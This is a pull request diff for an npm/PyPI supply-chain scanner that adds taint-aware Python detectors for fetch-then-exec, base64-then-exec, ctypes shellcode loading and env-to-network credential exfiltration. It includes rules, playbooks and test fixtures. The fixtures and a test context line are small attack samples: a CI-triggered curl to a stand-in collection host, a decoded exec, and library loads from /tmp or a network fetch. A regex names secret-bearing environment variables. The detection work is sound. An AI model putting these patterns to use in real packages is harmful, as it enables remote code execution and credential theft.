### PR TITLE
v2.11.45 - feat: PYAST Phase 1b — taint-aware detectors

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -105,14 +105,14 @@ Never skip documentation updates when publishing a new version.
 - Never commit directly to master
 - Do not create commits automatically — the user handles commits manually
 
-## Current Metrics (v2.11.43)
+## Current Metrics (v2.11.45)
 
 | Metric | Value |
 |--------|-------|
-| Version | **2.11.43** |
-| Tests | **3873** passed, 0 failed, across 105 files (14511 skipped when Docker absent) |
-| Rules | **252** (247 RULES + 5 PARANOID) |
-| Scanners | **20 parallel** (Promise.allSettled) + **2 pre-analysis** (module-graph/, deobfuscate) + **1 async parser bootstrap** (python-ast WASM init, no analysis emitted) + **5 conditional/post-processing** (paranoid, 3× temporal-*, reachability) + **1 metadata** (npm-registry). 25 fichiers `src/scanner/*.js` + 1 dir `module-graph/` (9 fichiers) + 1 dir `python-ast-detectors/` (4 fichiers). Détails : ARCHITECTURE.md. |
+| Version | **2.11.45** |
+| Tests | **3870** passed, 0 failed, across 105 files (14511 skipped when Docker absent) |
+| Rules | **256** (251 RULES + 5 PARANOID) |
+| Scanners | **20 parallel** (Promise.allSettled) + **2 pre-analysis** (module-graph/, deobfuscate) + **1 async parser bootstrap** (python-ast WASM init, no analysis emitted) + **5 conditional/post-processing** (paranoid, 3× temporal-*, reachability) + **1 metadata** (npm-registry). 25 fichiers `src/scanner/*.js` + 1 dir `module-graph/` (9 fichiers) + 1 dir `python-ast-detectors/` (6 fichiers, +taint-tracker + handle-assignment depuis Phase 1b). Détails : ARCHITECTURE.md. |
 | TPR@3 (detection rate) | **93.85%** (61/65 ground truth, v2.10.95 metrics — re-measure pending P0-04 audit) |
 | TPR@20 (alert rate) | **86.2%** (56/65 ground truth, v2.10.95 metrics) |
 | FPR rules (curated, v2.10.95 measure) | **15.6%** (85/545 scanned of 548 benign packages) |

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.44",
+  "version": "2.11.45",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.44",
+      "version": "2.11.45",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.4.3",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.44",
+  "version": "2.11.45",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -504,6 +504,30 @@ const PLAYBOOKS = {
     'NE PAS installer. Verifier si l\'agent a ete execute. Si oui, considerer la machine compromise. ' +
     'Auditer les fichiers sensibles (.ssh, .aws, .env) pour des acces non autorises.',
 
+  pyast_fetch_to_exec_taint:
+    'CRITIQUE: Pattern TrapDoor confirme par taint AST. Une variable Python a recu un payload via un fetch reseau ' +
+    '(urllib/requests/httpx/aiohttp/http.client) puis est passee a exec()/eval() au niveau module — RCE direct ' +
+    'a l\'import / pip install. NE PAS installer. Bloquer le domaine du fetch dans le firewall. ' +
+    'Si execute: incident response complet, regenerer TOUS les secrets sur la machine.',
+
+  pyast_base64_to_exec_taint:
+    'CRITIQUE: Pattern d\'obfuscation confirme par taint AST. Une variable Python a recu un payload decodé ' +
+    '(base64/codecs/zlib/gzip/binascii) puis est passee a exec()/eval() au niveau module. NE PAS installer. ' +
+    'Decoder manuellement le payload (python3 -c "import base64; print(base64.b64decode(b\'<blob>\'))") pour ' +
+    'identifier le code masque avant d\'evaluer la portee.',
+
+  pyast_ctypes_shellcode_load:
+    'HIGH: Loader de shellcode native suspect — ctypes.CDLL/WinDLL/LoadLibrary avec (a) un path en zone ' +
+    'world-writable (/tmp, /var/tmp, /dev/shm, ~/, C:\\Windows\\Temp\\) ou (b) un argument taintee venant ' +
+    'd\'un fetch reseau ou d\'un decode. Pattern classique RAT Python (charge un .so/.dll droppe en memoire). ' +
+    'NE PAS installer. Inspecter le path / la variable pour confirmer la provenance du binaire native.',
+
+  pyast_env_to_network_write:
+    'HIGH (ou CRITIQUE si env name match credential pattern): exfiltration de credentials confirmee par taint ' +
+    'AST. Une variable Python a recu une valeur depuis os.environ / os.getenv puis est envoyee dans le body ' +
+    'd\'une requete POST/PUT/PATCH (requests/httpx/urllib.Request). NE PAS installer. Si l\'env var name est ' +
+    'sensible (TOKEN/KEY/SECRET/...), revoke immediatement la credential exposee. Bloquer le domaine du POST.',
+
   canary_exfiltration:
     'CRITIQUE: Le package a tente de voler des credentials (honey tokens). Comportement malveillant confirme. ' +
     'NE PAS installer. Signaler immediatement sur npm/PyPI. ' +

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -427,6 +427,64 @@ const RULES = {
     mitre: 'T1027'
   },
 
+  // PYAST-005, 006, 009, 010 — Phase 1b (v2.11.45) : detecteurs taint-aware
+  // qui utilisent ctx.moduleTaint populee par handle-assignment.js.
+  // Mini-taint intra-procedural mono-fichier, single-hop. Voir python-ast-detectors/
+  // taint-tracker.js pour les sources + le plan Phase 1b pour les limitations.
+  pyast_fetch_to_exec_taint: {
+    id: 'MUADDIB-PYAST-005',
+    name: 'Python Fetch + Exec Taint (TrapDoor compound)',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Compound taint-aware : variable assignee depuis un fetch reseau (urllib / requests / httpx / aiohttp / http.client) puis passee a exec()/eval() au niveau module. Signature directe de remote-payload-then-RCE — pattern TrapDoor mai 2026 et Lazarus PyPI series.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1105/',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1105'
+  },
+  pyast_base64_to_exec_taint: {
+    id: 'MUADDIB-PYAST-006',
+    name: 'Python Base64/Decode + Exec Taint (Obfuscated Payload)',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Compound taint-aware : variable assignee depuis un decode (base64 / codecs / zlib / gzip / binascii / bytes.fromhex) puis passee a exec()/eval() au niveau module. Pattern d\'obfuscation pour echapper a la revue + grep statique. Vu dans W4SP / Crystal / Lumma stealers PyPI.',
+    references: [
+      'https://attack.mitre.org/techniques/T1027/',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1027'
+  },
+  pyast_ctypes_shellcode_load: {
+    id: 'MUADDIB-PYAST-009',
+    name: 'Python ctypes Shellcode Loader',
+    severity: 'HIGH',
+    confidence: 'medium',
+    domain: 'malware',
+    description: 'ctypes.CDLL / WinDLL / LoadLibrary appele avec (a) un path suspect (/tmp, /var/tmp, /dev/shm, ~/, C:\\Windows\\Temp\\, ...) ou (b) un argument taintee venant d\'un fetch ou d\'un decode. Pattern de loader de shellcode native (.so / .dll dropped sur disque puis charge en memoire). Vu dans les campagnes RATs Python.',
+    references: [
+      'https://docs.python.org/3/library/ctypes.html',
+      'https://attack.mitre.org/techniques/T1055/'
+    ],
+    mitre: 'T1055'
+  },
+  pyast_env_to_network_write: {
+    id: 'MUADDIB-PYAST-010',
+    name: 'Python Env Read + Network POST Taint (Credential Exfil)',
+    severity: 'HIGH',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Compound taint-aware : variable assignee depuis os.environ[X] / os.environ.get(X) / os.getenv(X) puis envoyee dans le body d\'une requete POST/PUT/PATCH (requests / httpx / urllib.Request). Pattern d\'exfiltration de credentials. Severity escaladee a CRITICAL si le nom de la variable d\'env match un pattern sensible (TOKEN, KEY, SECRET, PASSWORD, NPM_, AWS_, SSH, API, GITHUB_, HF_, ANTHROPIC, ...).',
+    references: [
+      'https://attack.mitre.org/techniques/T1041/',
+      'https://attack.mitre.org/techniques/T1552/001/'
+    ],
+    mitre: 'T1041'
+  },
+
   suspicious_file: {
     id: 'MUADDIB-DEP-002',
     name: 'Suspicious File in Dependency',

--- a/src/scanner/python-ast-detectors/handle-assignment.js
+++ b/src/scanner/python-ast-detectors/handle-assignment.js
@@ -1,0 +1,38 @@
+'use strict';
+
+const { classifyTaintSource } = require('./taint-tracker.js');
+
+/**
+ * Visit `assignment` nodes at module level (scope_depth === 0) and populate
+ * `ctx.moduleTaint`. Cleared on reassignment.
+ *
+ * V1 restrictions (intentional — see plan file Phase 1b):
+ *  - module level only ; assignments inside functions/classes/lambdas are ignored
+ *  - LHS must be a bare identifier (no tuple unpack, no attribute, no subscript)
+ *  - single hop only (no alias propagation A → B → sink)
+ *  - reassignment to a non-source value CLEARS the taint
+ */
+function handleAssignment(node, ctx, scopeDepth) {
+  if (scopeDepth !== 0) return;
+  if (!ctx.moduleTaint) return; // defensive — should always be initialised per-file
+
+  const left = node.childForFieldName('left');
+  const right = node.childForFieldName('right');
+  if (!left || !right) return;
+
+  // Tuple/list LHS, attribute LHS, subscript LHS — V1 skips (Phase 3 alias
+  // tracking will handle attribute/subscript). Bare identifier only.
+  if (left.type !== 'identifier') return;
+
+  const taint = classifyTaintSource(right);
+  if (taint) {
+    ctx.moduleTaint.set(left.text, taint);
+  } else if (ctx.moduleTaint.has(left.text)) {
+    // Reassignment to a non-source value — clear previous taint.
+    // Prevents FP where `payload = source(); payload = "harmless"; exec(payload)`
+    // would otherwise still flag based on the original taint.
+    ctx.moduleTaint.delete(left.text);
+  }
+}
+
+module.exports = { handleAssignment };

--- a/src/scanner/python-ast-detectors/handle-call-expression.js
+++ b/src/scanner/python-ast-detectors/handle-call-expression.js
@@ -8,12 +8,19 @@ const {
   isTruthyLiteral,
   lineOf
 } = require('./helpers.js');
+const { lookupTaint, isEnvSensitive } = require('./taint-tracker.js');
 
 /**
- * Visitor for `call` nodes. Emits PYAST-003, PYAST-004, PYAST-007, PYAST-008.
+ * Visitor for `call` nodes. Emits PYAST-003, PYAST-004, PYAST-005, PYAST-006,
+ * PYAST-007, PYAST-008, PYAST-009, PYAST-010.
  *
  * PYAST-001 / PYAST-002 are emitted by `handle-setup-call.js` which is a
  * specialised pass over the same node type — it only fires on `setup(...)`.
+ *
+ * Taint-aware detectors (005/006/009/010) read `ctx.moduleTaint` populated
+ * by `handle-assignment.js`. They only fire at scope_depth === 0 (module-level
+ * sinks paired with module-level sources — see plan Phase 1b for the
+ * intra-procedural / single-hop restrictions).
  */
 
 const MODULE_EXEC_CALLEES = new Set(['exec', 'eval']);
@@ -58,6 +65,66 @@ const DANGEROUS_DYNAMIC_IMPORTS = new Set([
   'importlib'
 ]);
 
+// Network "write" sinks for PYAST-010. POST/PUT/PATCH-style sends.
+const NETWORK_WRITE_CALLEES = new Set([
+  'requests.post',
+  'requests.put',
+  'requests.patch',
+  'requests.delete',
+  'requests.request',
+  'httpx.post',
+  'httpx.put',
+  'httpx.patch',
+  'httpx.delete',
+  'httpx.request',
+  'urllib.request.urlopen',  // can send body when called on a Request object
+  'urllib.request.Request'
+]);
+
+const NETWORK_DATA_KWARGS = new Set(['data', 'json', 'body', 'files', 'params']);
+
+// ctypes loaders for PYAST-009.
+const CTYPES_LOAD_CALLEES = new Set([
+  'ctypes.CDLL',
+  'ctypes.WinDLL',
+  'ctypes.cdll.LoadLibrary',
+  'ctypes.windll.LoadLibrary',
+  'ctypes.PyDLL'
+]);
+
+const SUSPICIOUS_PATH_RE = /^(\/tmp\/|\/var\/tmp\/|\/dev\/shm\/|~\/|\$HOME\/|C:\\Users\\Public\\|C:\\Windows\\Temp\\|\.\/_?cache\/)/i;
+
+// ---------------------------------------------------------------------------
+// Helper: iterate positional args of a call, skipping syntax noise.
+// ---------------------------------------------------------------------------
+function* positionalArgs(callNode) {
+  const args = callNode.childForFieldName('arguments');
+  if (!args) return;
+  for (const child of args.children) {
+    if (child.type === 'keyword_argument' || child.type === ','
+        || child.type === '(' || child.type === ')') continue;
+    yield child;
+  }
+}
+
+// Returns the value node of a kwarg with the given name, or null.
+function getKwargValue(callNode, kwName) {
+  const args = callNode.childForFieldName('arguments');
+  if (!args) return null;
+  for (const child of args.children) {
+    if (child.type !== 'keyword_argument') continue;
+    const nameNode = child.childForFieldName('name');
+    if (nameNode && nameNode.text === kwName) {
+      return child.childForFieldName('value');
+    }
+  }
+  return null;
+}
+
+// ---------------------------------------------------------------------------
+// Main visitor
+// ---------------------------------------------------------------------------
+
 function handleCallExpression(node, ctx, scopeDepth) {
   const callee = calleeDottedName(node);
   if (!callee) return;
@@ -71,6 +138,31 @@ function handleCallExpression(node, ctx, scopeDepth) {
       file: ctx.relFile,
       line: lineOf(node)
     });
+
+    // PYAST-005 / PYAST-006: taint-aware compounds layered on top of PYAST-003.
+    // Walk the positional args; if any is a tainted identifier we fire the
+    // appropriate compound. Multiple sources in the same call → multiple emits.
+    for (const arg of positionalArgs(node)) {
+      const taint = lookupTaint(ctx, arg);
+      if (!taint) continue;
+      if (taint.sourceType === 'fetch') {
+        ctx.threats.push({
+          type: 'pyast_fetch_to_exec_taint',
+          severity: 'CRITICAL',
+          message: `${ctx.relFile}:${lineOf(node)}: ${callee}(${arg.text}) — argument was assigned earlier from a network fetch (urllib / requests / http.client / httpx / aiohttp). TrapDoor-style remote-payload-then-RCE.`,
+          file: ctx.relFile,
+          line: lineOf(node)
+        });
+      } else if (taint.sourceType === 'base64') {
+        ctx.threats.push({
+          type: 'pyast_base64_to_exec_taint',
+          severity: 'CRITICAL',
+          message: `${ctx.relFile}:${lineOf(node)}: ${callee}(${arg.text}) — argument was assigned earlier from a decode call (base64 / codecs / zlib / gzip / binascii). Obfuscated payload execution pattern.`,
+          file: ctx.relFile,
+          line: lineOf(node)
+        });
+      }
+    }
   }
 
   // PYAST-004: subprocess.X(..., shell=True) at module level.
@@ -113,6 +205,99 @@ function handleCallExpression(node, ctx, scopeDepth) {
       });
     }
   }
+
+  // PYAST-009: ctypes.CDLL / WinDLL / LoadLibrary with suspicious path OR
+  // tainted argument. Fires at any scope depth (loading shellcode is dangerous
+  // wherever it runs, but module-level is the worst).
+  if (CTYPES_LOAD_CALLEES.has(callee)) {
+    const firstArg = firstPositionalArg(node);
+    if (firstArg) {
+      const litPath = stringLiteralValue(firstArg);
+      if (litPath && SUSPICIOUS_PATH_RE.test(litPath)) {
+        ctx.threats.push({
+          type: 'pyast_ctypes_shellcode_load',
+          severity: 'HIGH',
+          message: `${ctx.relFile}:${lineOf(node)}: ${callee}('${litPath}') — loads a native library from a suspicious path (temp / world-writable / user-cache). Common shellcode loader pattern.`,
+          file: ctx.relFile,
+          line: lineOf(node)
+        });
+      } else {
+        const taint = lookupTaint(ctx, firstArg);
+        if (taint && (taint.sourceType === 'fetch' || taint.sourceType === 'base64')) {
+          ctx.threats.push({
+            type: 'pyast_ctypes_shellcode_load',
+            severity: 'HIGH',
+            message: `${ctx.relFile}:${lineOf(node)}: ${callee}(${firstArg.text}) — native library loaded from a tainted argument (assigned from ${taint.sourceType === 'fetch' ? 'network fetch' : 'base64/decode chain'}). Shellcode loader pattern.`,
+            file: ctx.relFile,
+            line: lineOf(node)
+          });
+        }
+      }
+    }
+  }
+
+  // PYAST-010: env var read → network POST/PUT/etc. sink at module level.
+  // Walks the call's positional args + sensitive kwargs (data, json, body, ...)
+  // looking for a tainted identifier with sourceType === 'env'. Severity
+  // escalates to CRITICAL if the env var name matches the sensitive pattern.
+  if (NETWORK_WRITE_CALLEES.has(callee) && scopeDepth === 0) {
+    const candidates = [];
+    for (const arg of positionalArgs(node)) candidates.push(arg);
+    for (const kwName of NETWORK_DATA_KWARGS) {
+      const v = getKwargValue(node, kwName);
+      if (v) candidates.push(v);
+    }
+    for (const arg of candidates) {
+      // Direct identifier: data=token
+      if (arg.type === 'identifier') {
+        const taint = lookupTaint(ctx, arg);
+        if (taint && taint.sourceType === 'env') {
+          emitEnvNetwork(ctx, node, callee, arg.text, taint.envVarName);
+          break; // one finding per call
+        }
+      }
+      // Container literal: data={"t": token}, json=[token]
+      // Walk one level deep looking for tainted identifiers.
+      if (arg.type === 'dictionary' || arg.type === 'list' || arg.type === 'tuple') {
+        const tainted = findTaintedIdentifierIn(arg, ctx);
+        if (tainted) {
+          emitEnvNetwork(ctx, node, callee, tainted.text, tainted.taint.envVarName);
+          break;
+        }
+      }
+    }
+  }
+}
+
+function emitEnvNetwork(ctx, callNode, callee, varName, envVarName) {
+  const sensitive = isEnvSensitive(envVarName);
+  ctx.threats.push({
+    type: 'pyast_env_to_network_write',
+    severity: sensitive ? 'CRITICAL' : 'HIGH',
+    message: `${ctx.relFile}:${lineOf(callNode)}: ${callee}(...) at module level receives '${varName}' which was assigned from os.environ['${envVarName}']${sensitive ? ' — sensitive env var name matches credential pattern, credential exfil suspected.' : ' — env-to-network exfil pattern.'}`,
+    file: ctx.relFile,
+    line: lineOf(callNode)
+  });
+}
+
+// Walks one level inside a dict / list / tuple looking for an identifier whose
+// taint sourceType === 'env'. Returns { text, taint } or null. Single hop only
+// — does not recurse into nested containers (V1 limitation, matches plan).
+function findTaintedIdentifierIn(containerNode, ctx) {
+  for (const child of containerNode.children) {
+    if (child.type === 'identifier') {
+      const taint = lookupTaint(ctx, child);
+      if (taint && taint.sourceType === 'env') return { text: child.text, taint };
+    }
+    if (child.type === 'pair') {
+      const v = child.childForFieldName('value');
+      if (v && v.type === 'identifier') {
+        const taint = lookupTaint(ctx, v);
+        if (taint && taint.sourceType === 'env') return { text: v.text, taint };
+      }
+    }
+  }
+  return null;
 }
 
 module.exports = { handleCallExpression };

--- a/src/scanner/python-ast-detectors/index.js
+++ b/src/scanner/python-ast-detectors/index.js
@@ -2,6 +2,7 @@
 
 const { handleCallExpression } = require('./handle-call-expression.js');
 const { handleSetupCall } = require('./handle-setup-call.js');
+const { handleAssignment } = require('./handle-assignment.js');
 const helpers = require('./helpers.js');
 
 // Two visitors run on the `call` node type. `walk()` only dispatches one
@@ -13,7 +14,8 @@ function callDispatcher(node, ctx, scopeDepth) {
 
 module.exports = {
   visitors: {
-    call: callDispatcher
+    call: callDispatcher,
+    assignment: handleAssignment
   },
   helpers
 };

--- a/src/scanner/python-ast-detectors/taint-tracker.js
+++ b/src/scanner/python-ast-detectors/taint-tracker.js
@@ -1,0 +1,210 @@
+'use strict';
+
+/**
+ * Mini taint tracker — Phase 1b of the PYAST roadmap.
+ *
+ * Scope (V1, deliberately minimal — see plan file for the full design):
+ *  - intra-procedural, module-level only (scope_depth === 0)
+ *  - single assignment hop : `var = source_expr` then `sink(..., var, ...)`
+ *  - reassignment clears taint
+ *  - bare identifiers only (no attribute / subscript LHS)
+ *  - no multi-hop chains (`a = src(); b = a; sink(b)` is NOT tracked — Phase 3)
+ *
+ * Sources :
+ *  - 'fetch'  : network reads (urllib, requests, httpx, aiohttp, http.client)
+ *  - 'base64' : decoders (base64.*, codecs.decode, zlib.decompress, gzip.decompress, binascii.unhexlify, bytes.fromhex)
+ *  - 'env'    : os.environ access (subscript + .get + os.getenv)
+ *
+ * Sinks are NOT defined here — they live in handle-call-expression.js. This
+ * module is the pure-source-classifier + lookup helper.
+ */
+
+const { dottedName, stringLiteralValue } = require('./helpers.js');
+
+// ---------------------------------------------------------------------------
+// FETCH source detection
+// ---------------------------------------------------------------------------
+
+const FETCH_DOTTED_CALLEES = new Set([
+  'urllib.request.urlopen',
+  'urllib2.urlopen',
+  'requests.get',
+  'requests.post',
+  'requests.put',
+  'requests.delete',
+  'requests.patch',
+  'requests.head',
+  'requests.options',
+  'requests.request',
+  'httpx.get',
+  'httpx.post',
+  'httpx.put',
+  'httpx.delete',
+  'httpx.patch',
+  'httpx.head',
+  'httpx.options',
+  'httpx.request'
+]);
+
+// Returns true if the call node is one of the http-class instantiations
+// (`http.client.HTTPSConnection(...)`, `http.client.HTTPConnection(...)`).
+function isHttpClientConnectionCall(callNode) {
+  const name = dottedName(callNode.childForFieldName('function'));
+  return name === 'http.client.HTTPSConnection' || name === 'http.client.HTTPConnection';
+}
+
+// Returns true if the expression is a "fetch" source, i.e. its evaluation
+// produces attacker-controlled bytes. Handles chains like `.read()` / `.text`
+// / `.content` / `.json()` applied to the fetch result.
+function isFetchSource(node) {
+  if (!node) return false;
+
+  // Direct call: requests.get(...) , urllib.request.urlopen(...)
+  if (node.type === 'call') {
+    const name = dottedName(node.childForFieldName('function'));
+    if (name && FETCH_DOTTED_CALLEES.has(name)) return true;
+    if (isHttpClientConnectionCall(node)) return true; // produces a connection object — treated as fetch
+    // Method call on a fetch result: requests.get(...).text, urlopen(...).read()
+    // The .read() / .json() form is itself a `call` node whose function is an
+    // `attribute` whose object is the inner call. Walk one level.
+    const fn = node.childForFieldName('function');
+    if (fn && fn.type === 'attribute') {
+      const inner = fn.childForFieldName('object');
+      const methodNode = fn.childForFieldName('attribute');
+      const methodName = methodNode && methodNode.text;
+      if (['read', 'json', 'text', 'content', 'iter_content', 'iter_lines'].includes(methodName)) {
+        if (isFetchSource(inner)) return true;
+      }
+    }
+  }
+
+  // Attribute access on a fetch result: `r.text`, `r.content`, `r.json` (no call)
+  if (node.type === 'attribute') {
+    const inner = node.childForFieldName('object');
+    const attr = node.childForFieldName('attribute');
+    if (attr && ['text', 'content', 'json'].includes(attr.text)) {
+      if (isFetchSource(inner)) return true;
+    }
+  }
+
+  return false;
+}
+
+// ---------------------------------------------------------------------------
+// BASE64 / decode source detection
+// ---------------------------------------------------------------------------
+
+const DECODE_DOTTED_CALLEES = new Set([
+  'base64.b64decode',
+  'base64.b32decode',
+  'base64.b16decode',
+  'base64.standard_b64decode',
+  'base64.urlsafe_b64decode',
+  'base64.a85decode',
+  'base64.b85decode',
+  'codecs.decode',
+  'zlib.decompress',
+  'gzip.decompress',
+  'bz2.decompress',
+  'lzma.decompress',
+  'binascii.unhexlify',
+  'binascii.a2b_base64',
+  'binascii.a2b_hex',
+  'bytes.fromhex' // `bytes.fromhex("...")` decodes a hex string
+]);
+
+function isBase64Source(node) {
+  if (!node || node.type !== 'call') return false;
+  const name = dottedName(node.childForFieldName('function'));
+  if (name && DECODE_DOTTED_CALLEES.has(name)) return true;
+  return false;
+}
+
+// ---------------------------------------------------------------------------
+// ENV source detection — returns { sourceType: 'env', envVarName }
+// ---------------------------------------------------------------------------
+
+// Sensitive env var name patterns — match triggers severity escalation
+// for PYAST-010. Conservative list (substring match, case-insensitive).
+const SENSITIVE_ENV_RE = /(TOKEN|KEY|SECRET|PASSWORD|PASSWD|CREDENTIAL|CRED|NPM_|AWS_|SSH|API|GITHUB_|GH_|HF_|ANTHROPIC|OPENAI|SLACK|DISCORD|TELEGRAM|STRIPE|GCP|AZURE|DATABASE_URL|DB_PASS)/i;
+
+function isEnvSensitive(envVarName) {
+  return typeof envVarName === 'string' && SENSITIVE_ENV_RE.test(envVarName);
+}
+
+// Returns the env var name (string) if `node` reads from os.environ / os.getenv,
+// or null. For subscript access like `os.environ['X']` returns 'X'.
+// For `os.environ[X]` (computed key) returns '<computed>'.
+function classifyEnvSource(node) {
+  if (!node) return null;
+
+  // subscript: os.environ['X'] or os.environ[X]
+  if (node.type === 'subscript') {
+    const obj = node.childForFieldName('value');
+    if (obj && dottedName(obj) === 'os.environ') {
+      const subscript = node.childForFieldName('subscript');
+      const lit = stringLiteralValue(subscript);
+      return lit !== null ? lit : '<computed>';
+    }
+  }
+
+  // call: os.environ.get('X', ...) or os.getenv('X', ...)
+  if (node.type === 'call') {
+    const name = dottedName(node.childForFieldName('function'));
+    if (name === 'os.environ.get' || name === 'os.getenv') {
+      const args = node.childForFieldName('arguments');
+      if (args) {
+        for (const child of args.children) {
+          if (child.type === 'keyword_argument' || child.type === ',' ||
+              child.type === '(' || child.type === ')') continue;
+          const lit = stringLiteralValue(child);
+          if (lit !== null) return lit;
+          return '<computed>';
+        }
+      }
+    }
+  }
+
+  return null;
+}
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+/**
+ * Classify the taint of an RHS expression node. Returns:
+ *   { sourceType: 'fetch'|'base64'|'env', envVarName?: string }
+ * or null if the node is not a recognised tainted source.
+ */
+function classifyTaintSource(node) {
+  if (!node) return null;
+  if (isFetchSource(node)) return { sourceType: 'fetch' };
+  if (isBase64Source(node)) return { sourceType: 'base64' };
+  const envVarName = classifyEnvSource(node);
+  if (envVarName !== null) return { sourceType: 'env', envVarName };
+  return null;
+}
+
+/**
+ * Returns the taint record for a variable, or null.
+ * Caller filters on sourceType if needed.
+ */
+function lookupTaint(ctx, identifierNode) {
+  if (!identifierNode || identifierNode.type !== 'identifier') return null;
+  if (!ctx.moduleTaint) return null;
+  return ctx.moduleTaint.get(identifierNode.text) || null;
+}
+
+module.exports = {
+  classifyTaintSource,
+  lookupTaint,
+  isEnvSensitive,
+  // Exposed for unit tests
+  _internal: {
+    isFetchSource,
+    isBase64Source,
+    classifyEnvSource,
+    SENSITIVE_ENV_RE
+  }
+};

--- a/src/scanner/python-ast.js
+++ b/src/scanner/python-ast.js
@@ -147,7 +147,11 @@ function scanPythonAST(targetPath) {
       threats,
       relFile: path.relative(targetPath, file),
       source,
-      invisibleCount
+      invisibleCount,
+      // Per-file taint map populated by handle-assignment.js at scope_depth==0
+      // and read by handle-call-expression.js for compound detections
+      // (PYAST-005/006/009/010). See python-ast-detectors/taint-tracker.js.
+      moduleTaint: new Map()
     };
 
     walk(tree.rootNode, ctx, visitors);

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 252 (247 RULES + 5 PARANOID, PYAST-001/002/003/004/007/008: +6 rules)', () => {
+  test('v8b: rule count is 256 (251 RULES + 5 PARANOID, PYAST-005/006/009/010 Phase 1b: +4 rules)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 247, `Expected 247 RULES, got ${ruleCount}`);
+    assert(ruleCount === 251, `Expected 251 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -157,12 +157,12 @@ jobs:
     }
   });
 
-  // 3.3b Rule count check (PYAST-001/002/003/004/007/008: +6 rules → 247 RULES)
-  test('P3: rule count is 252 (247 RULES + 5 PARANOID)', () => {
+  // 3.3b Rule count check (PYAST-005/006/009/010 Phase 1b: +4 rules → 251 RULES)
+  test('P3: rule count is 256 (251 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 247, `Expected 247 RULES, got ${ruleCount}`);
+    assert(ruleCount === 251, `Expected 251 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/samples/python-ast/base64-exec-taint/__init__.py
+++ b/tests/samples/python-ast/base64-exec-taint/__init__.py
@@ -1,0 +1,4 @@
+# Fixture: PYAST-006 — base64 decode then exec. Decoded value is "print('inert')".
+import base64
+code = base64.b64decode(b"cHJpbnQoJ2luZXJ0Jyk=")
+exec(code)

--- a/tests/samples/python-ast/base64-exec-taint/package.json
+++ b/tests/samples/python-ast/base64-exec-taint/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-base64-exec-taint-fixture", "version": "0.0.0", "description": "PYAST-006 positive (base64→exec taint). NOT REAL MALWARE." }

--- a/tests/samples/python-ast/ctypes-legit-lib/__init__.py
+++ b/tests/samples/python-ast/ctypes-legit-lib/__init__.py
@@ -1,0 +1,4 @@
+# Fixture: NEG — legit ctypes load from system path. Should NOT fire PYAST-009.
+import ctypes
+_libssl = ctypes.CDLL("libssl.so")
+_libc = ctypes.CDLL("/usr/lib/libc.so")

--- a/tests/samples/python-ast/ctypes-legit-lib/package.json
+++ b/tests/samples/python-ast/ctypes-legit-lib/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-ctypes-legit-lib-fixture", "version": "0.0.0", "description": "Negative: legitimate system library load — no fire." }

--- a/tests/samples/python-ast/ctypes-tainted-fetch/__init__.py
+++ b/tests/samples/python-ast/ctypes-tainted-fetch/__init__.py
@@ -1,0 +1,5 @@
+# Fixture: PYAST-009 — ctypes.CDLL with arg coming from a network fetch.
+import urllib.request
+import ctypes
+blob = urllib.request.urlopen("http://127.0.0.1:0/synthetic").read()
+ctypes.CDLL(blob)

--- a/tests/samples/python-ast/ctypes-tainted-fetch/package.json
+++ b/tests/samples/python-ast/ctypes-tainted-fetch/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-ctypes-tainted-fetch-fixture", "version": "0.0.0", "description": "PYAST-009 (tainted arg from fetch)." }

--- a/tests/samples/python-ast/ctypes-tmp-path/__init__.py
+++ b/tests/samples/python-ast/ctypes-tmp-path/__init__.py
@@ -1,0 +1,3 @@
+# Fixture: PYAST-009 — ctypes.CDLL loading from /tmp (world-writable).
+import ctypes
+ctypes.CDLL("/tmp/payload.so")

--- a/tests/samples/python-ast/ctypes-tmp-path/package.json
+++ b/tests/samples/python-ast/ctypes-tmp-path/package.json
@@ -1,0 +1,1 @@
+{ "name": "pyast-ctypes-tmp-path-fixture", "version": "0.0.0", "description": "PYAST-009 (ctypes literal suspicious path)." }

--- a/tests/samples/python-ast/env-flag-exfil/__init__.py
+++ b/tests/samples/python-ast/env-flag-exfil/__init__.py
@@ -1,0 +1,5 @@
+# Fixture: PYAST-010 HIGH — non-sensitive env name POSTed (less alarming but still flagged).
+import os
